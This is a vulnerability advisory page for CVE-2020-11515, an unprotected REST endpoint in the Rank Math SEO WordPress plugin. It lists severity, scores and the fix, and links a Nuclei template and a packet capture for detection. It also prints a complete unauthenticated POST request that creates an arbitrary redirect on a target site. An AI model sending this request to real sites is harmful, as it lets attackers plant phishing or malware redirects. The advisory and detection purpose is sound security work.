🔙 목록으로 돌아가기

CVE-2020-11515: Rank Math SEO <= 1.0.40.2 - Redirect Creation via Unprotected REST API Endpoint

TitleRank Math SEO <= 1.0.40.2 - Redirect Creation via Unprotected REST API Endpoint
Authors4e-io
SeverityMedium
ImpactUnauthenticated attackers can create arbitrary redirect URIs on the WordPress site, which can be used for phishing attacks, SEO manipulation, or distributing malware by redirecting users to malicious external sites.
RemediationUpdate the Rank Math SEO plugin to version 1.0.41 or later.
CVSS Score6.1
EPSS Score0.00857
CVE IDCVE-2020-11515
CWE IDCWE-601
Tags cve cve2020 wordpress wordfence redirect seo-by-rank-math wp-plugin wp vkev vuln

🔍 Vulnerability Description

The Rank Math plugin through 1.0.40.2 for WordPress allows unauthenticated remote attackers to create new URIs (that redirect to an external web site) via the unsecured rankmath/v1/updateRedirection REST API endpoint. In other words, this is not an “Open Redirect” issue; instead, it allows the attacker to create a new URI with an arbitrary name (e.g., the /exampleredirect URI).

🌐 HTTP Request

POST /wp-json/rankmath/v1/updateRedirection HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Connection: close
Content-Length: 127
Content-Type: application/json
Accept-Encoding: gzip

{

  "redirectionUrl": "http://fvrqlnuardgiotopfjfh.kyxkc",

  "redirectionSources": "/gegorafzqc",

  "hasRedirect": "true"

}

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-11515.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-11515.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A